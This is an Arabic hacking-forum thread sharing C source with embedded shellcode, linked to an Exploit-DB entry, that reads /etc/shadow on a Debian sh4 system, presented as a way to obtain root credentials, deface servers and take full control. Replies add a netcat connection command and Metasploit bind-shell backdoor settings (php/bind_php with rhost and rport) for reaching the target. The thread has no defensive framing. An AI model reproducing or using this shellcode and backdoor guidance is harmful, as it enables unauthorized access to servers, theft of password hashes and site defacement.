|
تغرة لقراءة ملف etc/shadow جديدة السلام عليكم شباب تغرة قوية ان شاء الله لقراءة ملف shadow لي يحتوي على يوزر وباسوورد root السرفر ممكن بقراءته عمل ماس ديفايس للسرفر والتحكم الكامل بالسرفر :( :surprised: التغرة http://www.exploit-db.com/exploits/17432/ بسيط جدا الكود السورس : #include <stdio.h> #include <string.h> char *SC = "\x17\xe3\x4a\x24\x02\xc3\x0f\xe3\x05\xc7\x03" "\x64\x57\xe8\x05\xe9\x87\x09\x1a\x05\x03\x75" "\x02\xc3\x3a\x23\x01\xe3\x4a\x24\x02\xc3\x2f" "\x65\x74\x63\x2f\x73\x68\x61\x64\x6f\x77"; int main(void) { fprintf(stdout,"Length: %d\n",strlen(SC)); (*(void(*)()) SC)(); } ما اعرف ايش هو دلك الشيل كود المهم التغرة تعمل ب Debian-sh4 2.6.32-5-sh7751r ساجرب ان شاء الله ربما ترفع الملف بصيغة .c وتشغله بالنت كات ويتم عرض ملف shadow ساجرب ان شاء وارد من يعرف طريقة الاستغلال يقول :d:yes::yes: :diablo::diablo::diablo::diablo: |
اها عندي مشاكل بالاتصال بالسيرفر وهاد المشكله |
يلزمك تفتح بورت متلا بورت tcp 443 ويتصل بالطبع |
المشكله انا مشترك من كافيه نت ما عندي روتر بس هل الثغره فى اصدار بي اتش بي معين او فى برنامج على السيرفر |
اقتباس:
اقتباس:
أتصل مباشر مو عكسي nc -vv ip port >> hacker اما السرفر استخدم باك دور ميتا سبلويت msf> use payload/php/bind_php set rhost = server ip set rport = 9999 مثلاً او فيك تستخدم باكدورات جاهزة على النت , او شوف اي موقع يقدم خدمة vpn والبورتات مفتوحه . اقتباس:
فيك تختبره بأنظمة اخرى . جزاك الله خير في أمان وحفظ الرحمن |
تسلم يا عبدو |
رد: تغرة لقراءة ملف etc/shadow جديدة شكؤا لك |
رد: تغرة لقراءة ملف etc/shadow جديدة merciii |
| الساعة الآن 10:32 AM |
[ vBspiders.Com Network ]